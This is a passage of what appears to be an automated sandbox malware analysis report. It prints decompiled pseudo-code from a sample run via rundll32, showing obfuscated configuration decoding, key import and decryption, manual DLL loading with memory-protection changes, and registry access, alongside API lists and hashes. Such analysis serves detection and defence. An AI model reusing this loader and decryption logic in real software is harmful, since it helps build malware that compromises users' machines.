				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E04442F45(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E04441EF5(_t53);
						_t73 = _t51;
						_v8 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E044430D1(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E0444547D(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E04444CEA(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}

0x044474aa
0x044474ad
0x044474b6
0x044474b9
0x044474bc
0x044474bf
0x044475bb
0x044475bf
0x044474d1
0x044474dd
0x044474e4
0x044474eb
0x00000000
0x00000000
0x044474f1
0x044474f9
0x00000000
0x00000000
0x044474ff
0x04447508
0x0444750c
0x00000000
0x00000000
0x0444750e
0x04447515
0x0444751a
0x0444751c
0x0444751f
0x044475a0
0x044475a7
0x044475a9
0x00000000
0x00000000
0x044475ab
0x044475af
0x044475b4
0x044475b4
0x00000000
0x044475af
0x04447526
0x0444752e
0x0444752e
0x04447537
0x04447545
0x0444759c
0x0444759c
0x00000000
0x04447568
0x0444756b
0x00000000
0x0444756b
0x04447545
0x0444757a
0x04447588
0x0444758d
0x0444758f
0x044475a4
0x00000000
0x044475a4
0x04447591
0x04447597
0x0444759a
0x00000000
0x00000000
0x00000000
0x0444759a

APIs

memcpy.NTDLL(00000000,?,?,?,?,0444773A,?,0444773A,?,0444773A), ref: 04447526

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 04202be7d2e7439f0f465fee7ef635078d95a12f6c6ad01b1e0e539b0d56daa7
Instruction ID: f822515cc171b8caa419c43855f0b13ec0d49dfe58e77dd0f0c8b1c58ab0187e
Opcode Fuzzy Hash: 04202be7d2e7439f0f465fee7ef635078d95a12f6c6ad01b1e0e539b0d56daa7
Instruction Fuzzy Hash: 59311271A00219EFFF11DEA5C8C0BAEB779BB84304F1045AAE515AB641D730BE86CF60

Uniqueness

Uniqueness Score: -1.00%

Function 702E1FEC, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E702E1FEC(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x702e41cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x702e41cc - 0x69b24f45 &  !( *0x702e41cc - 0x69b24f45);
				_t18 = E702E1B2C( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x702e41cc - 0x69b24f45 &  !( *0x702e41cc - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x702e41cc - 0x69b24f45 &  !( *0x702e41cc - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E702E2096(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E702E1D62(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E702E14C6(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E702E2117(_t42);
					L8:
					return _t29;
				}
			}

0x702e1ff4
0x702e1ff6
0x702e2012
0x702e2023
0x702e202a
0x702e2088
0x00000000
0x702e202c
0x702e202c
0x702e2036
0x702e203a
0x702e203f
0x702e2042
0x702e2047
0x702e204b
0x702e2050
0x702e2055
0x702e2059
0x702e205e
0x702e205f
0x702e2063
0x702e2068
0x702e2070
0x702e2070
0x702e2068
0x702e2059
0x702e204b
0x702e2072
0x702e207b
0x702e207f
0x702e2089
0x702e208f
0x702e208f

APIs

Part of subcall function 702E1B2C: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,702E2028,?,?,?,?,00000002,00000000,?,?), ref: 702E1B50
Part of subcall function 702E1B2C: GetProcAddress.KERNEL32(00000000,?), ref: 702E1B72
Part of subcall function 702E1B2C: GetProcAddress.KERNEL32(00000000,?), ref: 702E1B88
Part of subcall function 702E1B2C: GetProcAddress.KERNEL32(00000000,?), ref: 702E1B9E
Part of subcall function 702E1B2C: GetProcAddress.KERNEL32(00000000,?), ref: 702E1BB4
Part of subcall function 702E1B2C: GetProcAddress.KERNEL32(00000000,?), ref: 702E1BCA

Part of subcall function 702E2096: memcpy.NTDLL(00000000,00000002,702E2036,?,?,?,?,?,702E2036,?,?,?,?,?,?,00000002), ref: 702E20C3
Part of subcall function 702E2096: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 702E20F6

Part of subcall function 702E1D62: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 702E1D9A

Part of subcall function 702E14C6: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 702E14FF
Part of subcall function 702E14C6: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 702E1574
Part of subcall function 702E14C6: GetLastError.KERNEL32 ref: 702E157A

GetLastError.KERNEL32(?,?), ref: 702E206A

Memory Dump Source

Source File: 0000001C.00000002.736184582.00000000702E1000.00000020.00020000.sdmp, Offset: 702E0000, based on PE: true

Associated: 0000001C.00000002.736175790.00000000702E0000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736193058.00000000702E3000.00000002.00020000.sdmp Download File
Associated: 0000001C.00000002.736201655.00000000702E5000.00000004.00020000.sdmp Download File
Associated: 0000001C.00000002.736210754.00000000702E6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_702e0000_rundll32.jbxd

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: 220ac5ee899f66d58052fb54a3abaf828940ed1ba7878273a0cc9622cfa48223
Instruction ID: 4e8d583136cc38ac00c92b89c5beed6a96c1ed0d98e035aa04a19ca28284ebbf
Opcode Fuzzy Hash: 220ac5ee899f66d58052fb54a3abaf828940ed1ba7878273a0cc9622cfa48223
Instruction Fuzzy Hash: 0F110B37640302AFD321AAA7CC88E9F77BDAF94214740456DFA4797241EAB1FD19C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04442E31, Relevance: 1.3, APIs: 1, Instructions: 42
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04442E31(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E04446184(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x444a290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E0444528F(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}

0x04442e31
0x04442e39
0x04442e50
0x04442e6b
0x04442e6f
0x04442e74
0x04442e76
0x04442e86
0x04442e92
0x04442e78
0x04442e78
0x04442e7b
0x04442e80
0x04442e80
0x04442e76
0x04442e98
0x04442e9c
0x04442e9c
0x04442e45
0x04442e4a
0x04442e4e
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 0444528F: SysFreeString.OLEAUT32(00000000), ref: 044452F5

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,04445362,?,004F0053,05349318,00000000,?), ref: 04442E92

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 793d7e66f67bd4576c9d1b7714f210cc217cdf209a1604a1f738c2b63bc7a3b5
Instruction ID: 20e7d1679638c75f7b0cb19c528f7d9b549fbec3f96b00369872142206fb23f3
Opcode Fuzzy Hash: 793d7e66f67bd4576c9d1b7714f210cc217cdf209a1604a1f738c2b63bc7a3b5
Instruction Fuzzy Hash: 2501FB32100659BBEF229F84CC01FEB7B65FB84791F14845AFE096A220D771EA61DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 044423A8, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E044423A8(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E04444CEA( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E04441EF5(_a8 + _a8);
					if(_t21 != 0) {
						E04443A96(_a4, _t21, _t23);
					}
					E044430D1(_a4);
				}
				return _t21;
			}

0x044423b0
0x044423b7
0x044423b9
0x044423c8
0x044423cf
0x044423de
0x044423e2
0x044423e9
0x044423e9
0x044423f1
0x044423f6
0x044423fb

APIs

lstrlen.KERNEL32(00000000,00000000,044470F6,00000000,?,04443A4A,00000000,044470F6,?,00000000,044470F6,00000000,05349630), ref: 044423B9

Part of subcall function 04444CEA: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,044423CD,00000001,044470F6,00000000), ref: 04444D22
Part of subcall function 04444CEA: memcpy.NTDLL(044423CD,044470F6,00000010,?,?,?,044423CD,00000001,044470F6,00000000,?,04443A4A,00000000,044470F6,?,00000000), ref: 04444D3B
Part of subcall function 04444CEA: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 04444D64
Part of subcall function 04444CEA: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 04444D7C
Part of subcall function 04444CEA: memcpy.NTDLL(00000000,00000000,05349630,00000010), ref: 04444DCE

Part of subcall function 04441EF5: RtlAllocateHeap.NTDLL(00000000,00000000,044432BC), ref: 04441F01

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: f63eca0fb970330b32f2ba26859d6ad76a3e935ffd56026cfcafd229251e12e9
Instruction ID: 1f6fc84bbbe2b73daa881ebf58bc9278dd749a33781fc82e9acca1d23d24d94a
Opcode Fuzzy Hash: f63eca0fb970330b32f2ba26859d6ad76a3e935ffd56026cfcafd229251e12e9
Instruction Fuzzy Hash: CFF09A36100108BBFF11AEA6DC04DEB3BADEFC53A4B008026FD18DA110DE31E6459BA0

Uniqueness

Uniqueness Score: -1.00%

Function 04443389, Relevance: 1.3, APIs: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04443389(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E04441D89(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E044456B5(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}

0x04443391
0x044433ab
0x00000000
0x044433c7
0x044433a2
0x044433a9
0x00000000
0x00000000
0x044433ce

APIs

lstrlenW.KERNEL32(?,?,?,04445CE7,3D044490,80000002,04441EAE,04441A9B,74666F53,4D4C4B48,04441A9B,?,3D044490,80000002,04441EAE,?), ref: 044433AE

Part of subcall function 044456B5: SysAllocString.OLEAUT32(04441A9B), ref: 044456CF
Part of subcall function 044456B5: SysFreeString.OLEAUT32(00000000), ref: 0444570F

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: 1b176d52ceb8599cfaa5770c994f056a6c39bfbbb1df19e3062adc3f5da4972d
Instruction ID: 373b32fdddbadf6be8e0b46558defc55ab5c3997251be7b039c0a96568e6469e
Opcode Fuzzy Hash: 1b176d52ceb8599cfaa5770c994f056a6c39bfbbb1df19e3062adc3f5da4972d
Instruction Fuzzy Hash: 86F0927200010EBFEF069F91DC05EDB3F6AEB58754F048015BE1454161DB32E9B1EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 044423FE, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E044423FE(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E04444E94(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E044430D1(_a4);
				}
				return _t12;
			}

0x0444240a
0x0444240f
0x04442413
0x0444241a
0x04442425
0x04442429
0x04442429
0x04442432

APIs

Part of subcall function 04444E94: memcpy.NTDLL(00000000,00000110,0444773A,0444773A,?,?,0444773A,?,?,044421ED,?), ref: 04444ECA
Part of subcall function 04444E94: memset.NTDLL ref: 04444F40
Part of subcall function 04444E94: memset.NTDLL ref: 04444F54

memcpy.NTDLL(0444773A,0444773A,00000000,0444773A,0444773A,0444773A,?,?,044421ED,?,?,0444773A,?), ref: 0444241A

Part of subcall function 044430D1: RtlFreeHeap.NTDLL(00000000,00000000,0444337A,00000000,00000000,?,00000000,?,?,?,?,?,04442534,00000000,?,00000001), ref: 044430DD

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: c07b1a155bc1d7cc8877d621b4889445eb73c80f73e572f5e160e91d87dced05
Instruction ID: a7cfe53c9ec6c9b8512c784f4e023250c1b433c2a894e9d681c9563edb3ac62c
Opcode Fuzzy Hash: c07b1a155bc1d7cc8877d621b4889445eb73c80f73e572f5e160e91d87dced05
Instruction Fuzzy Hash: E4E0863660011976EF122A95DC01DEBBF5CDF85AD0F004016FD0856201D631EA5093E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0444175B, Relevance: 12.2, APIs: 8, Instructions: 225
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0444175B(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				signed int _t59;
				void* _t61;
				void* _t62;
				signed int _t64;
				signed int _t67;
				signed int _t71;
				signed int _t75;
				signed int _t79;
				signed int _t83;
				signed int _t87;
				void* _t92;
				intOrPtr _t109;

				_t93 = __ecx;
				_t28 =  *0x444a2d0; // 0x69b25f44
				if(E04444ABB( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x444a324 = _v8;
				}
				_t33 =  *0x444a2d0; // 0x69b25f44
				if(E04444ABB( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L57:
					return _v12;
				}
				_t39 =  *0x444a2d0; // 0x69b25f44
				if(E04444ABB( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L55:
					HeapFree( *0x444a290, 0, _v16);
					goto L57;
				} else {
					_t92 = _v12;
					if(_t92 == 0) {
						_t45 = 0;
					} else {
						_t87 =  *0x444a2d0; // 0x69b25f44
						_t45 = E0444355B(_t93, _t92, _t87 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x444a298 = _v8;
						}
					}
					if(_t92 == 0) {
						_t46 = 0;
					} else {
						_t83 =  *0x444a2d0; // 0x69b25f44
						_t46 = E0444355B(_t93, _t92, _t83 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x444a29c = _v8;
						}
					}
					if(_t92 == 0) {
						_t47 = 0;
					} else {
						_t79 =  *0x444a2d0; // 0x69b25f44
						_t47 = E0444355B(_t93, _t92, _t79 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x444a2a0 = _v8;
						}
					}
					if(_t92 == 0) {
						_t48 = 0;
					} else {
						_t75 =  *0x444a2d0; // 0x69b25f44
						_t48 = E0444355B(_t93, _t92, _t75 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x444a004 = _v8;
						}
					}
					if(_t92 == 0) {
						_t49 = 0;
					} else {
						_t71 =  *0x444a2d0; // 0x69b25f44
						_t49 = E0444355B(_t93, _t92, _t71 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x444a02c = _v8;
						}
					}
					if(_t92 == 0) {
						_t50 = 0;
					} else {
						_t67 =  *0x444a2d0; // 0x69b25f44
						_t50 = E0444355B(_t93, _t92, _t67 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x444a2a4 = 5;
						goto L42;
					} else {
						_t93 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t92 == 0) {
								_t51 = 0;
							} else {
								_t64 =  *0x444a2d0; // 0x69b25f44
								_t51 = E0444355B(_t93, _t92, _t64 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t61 = 0x10;
								_t62 = E044434F0(_t61);
								if(_t62 != 0) {
									_push(_t62);
									E044446AC();
								}
							}
							if(_t92 == 0) {
								_t52 = 0;
							} else {
								_t59 =  *0x444a2d0; // 0x69b25f44
								_t52 = E0444355B(_t93, _t92, _t59 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E044434F0(0, _t52) != 0) {
								_t109 =  *0x444a37c; // 0x5349630
								E0444437C(_t109 + 4, _t57);
							}
							_t53 =  *0x444a2d4; // 0xefd5a8
							_t22 = _t53 + 0x444b2d2; // 0x534887a
							_t23 = _t53 + 0x444b7c4; // 0x6976612e
							 *0x444a320 = _t22;
							 *0x444a390 = _t23;
							HeapFree( *0x444a290, 0, _t92);
							_v12 = 0;
							goto L55;
						}
					}
				}
			}

0x0444175b
0x0444175e
0x0444177e
0x0444178c
0x0444178c
0x04441791
0x044417ab
0x044419b8
0x044419bf
0x044419c6
0x044419c6
0x044417b1
0x044417cd
0x044419a6
0x044419b0
0x00000000
0x044417d3
0x044417d3
0x044417d8
0x044417ee
0x044417da
0x044417da
0x044417e7
0x044417e7
0x044417f8
0x044417fa
0x04441804
0x04441809
0x04441809
0x04441804
0x04441810
0x04441826
0x04441812
0x04441812
0x0444181f
0x0444181f
0x0444182a
0x0444182c
0x04441836
0x0444183b
0x0444183b
0x04441836
0x04441842
0x04441858
0x04441844
0x04441844
0x04441851
0x04441851
0x0444185c
0x0444185e
0x04441868
0x0444186d
0x0444186d
0x04441868
0x04441874
0x0444188a
0x04441876
0x04441876
0x04441883
0x04441883
0x0444188e
0x04441890
0x0444189a
0x0444189f
0x0444189f
0x0444189a
0x044418a6
0x044418bc
0x044418a8
0x044418a8
0x044418b5
0x044418b5
0x044418c0
0x044418c2
0x044418cc
0x044418d1
0x044418d1
0x044418cc
0x044418d8
0x044418ee
0x044418da
0x044418da
0x044418e7
0x044418e7
0x044418f2
0x04441905
0x04441905
0x00000000
0x044418f4
0x044418f4
0x044418fe
0x00000000
0x0444190f
0x0444190f
0x04441911
0x04441927
0x04441913
0x04441913
0x04441920
0x04441920
0x0444192b
0x0444192d
0x04441930
0x04441931
0x04441938
0x0444193a
0x0444193b
0x0444193b
0x04441938
0x04441942
0x04441958
0x04441944
0x04441944
0x04441951
0x04441951
0x0444195c
0x0444196a
0x04441974
0x04441974
0x04441979
0x0444197f
0x0444198c
0x04441992
0x04441998
0x0444199d
0x044419a3
0x00000000
0x044419a3
0x044418fe
0x044418f2

APIs

StrToIntExA.SHLWAPI(00000000,00000000,044464BE,?,044464BE,69B25F44,?,?,69B25F44,044464BE,?,69B25F44,E8FA7DD7,0444A00C,7742C740), ref: 04441800
StrToIntExA.SHLWAPI(00000000,00000000,044464BE,?,044464BE,69B25F44,?,?,69B25F44,044464BE,?,69B25F44,E8FA7DD7,0444A00C,7742C740), ref: 04441832
StrToIntExA.SHLWAPI(00000000,00000000,044464BE,?,044464BE,69B25F44,?,?,69B25F44,044464BE,?,69B25F44,E8FA7DD7,0444A00C,7742C740), ref: 04441864
StrToIntExA.SHLWAPI(00000000,00000000,044464BE,?,044464BE,69B25F44,?,?,69B25F44,044464BE,?,69B25F44,E8FA7DD7,0444A00C,7742C740), ref: 04441896
StrToIntExA.SHLWAPI(00000000,00000000,044464BE,?,044464BE,69B25F44,?,?,69B25F44,044464BE,?,69B25F44,E8FA7DD7,0444A00C,7742C740), ref: 044418C8
StrToIntExA.SHLWAPI(00000000,00000000,044464BE,?,044464BE,69B25F44,?,?,69B25F44,044464BE,?,69B25F44,E8FA7DD7,0444A00C,7742C740), ref: 044418FA
HeapFree.KERNEL32(00000000,?,?,044464BE,69B25F44,?,?,69B25F44,044464BE,?,69B25F44,E8FA7DD7,0444A00C,7742C740), ref: 0444199D
HeapFree.KERNEL32(00000000,?,?,044464BE,69B25F44,?,?,69B25F44,044464BE,?,69B25F44,E8FA7DD7,0444A00C,7742C740), ref: 044419B0

Memory Dump Source

Source File: 0000001C.00000002.732318485.0000000004441000.00000020.00000001.sdmp, Offset: 04440000, based on PE: true

Associated: 0000001C.00000002.732309389.0000000004440000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732341694.0000000004449000.00000002.00000001.sdmp Download File
Associated: 0000001C.00000002.732352113.000000000444A000.00000004.00000001.sdmp Download File
Associated: 0000001C.00000002.732361052.000000000444C000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_4440000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 9541f18747318c8690e78cd4f85dd6113a15488f8c8bf19dfc8aee9b74f6a2d6
Instruction ID: 900d2d898bcb0d61a31dd47fc6ab65a6ed6938ed3e0c1670ea72f07d512e0a90
Opcode Fuzzy Hash: 9541f18747318c8690e78cd4f85dd6113a15488f8c8bf19dfc8aee9b74f6a2d6
Instruction Fuzzy Hash: 24715E75B00604AAFF11DBB9998CD9BB7ADEBC8714B244917E401E3345EA35FA84DB20

Uniqueness

Uniqueness Score: -1.00%

Function 702E2495, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E702E2495(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x702e41f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x702e4240 = 1;
										__eflags =  *0x702e4240;
										if( *0x702e4240 != 0) {
											goto L60;
										}
										_t84 =  *0x702e41f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
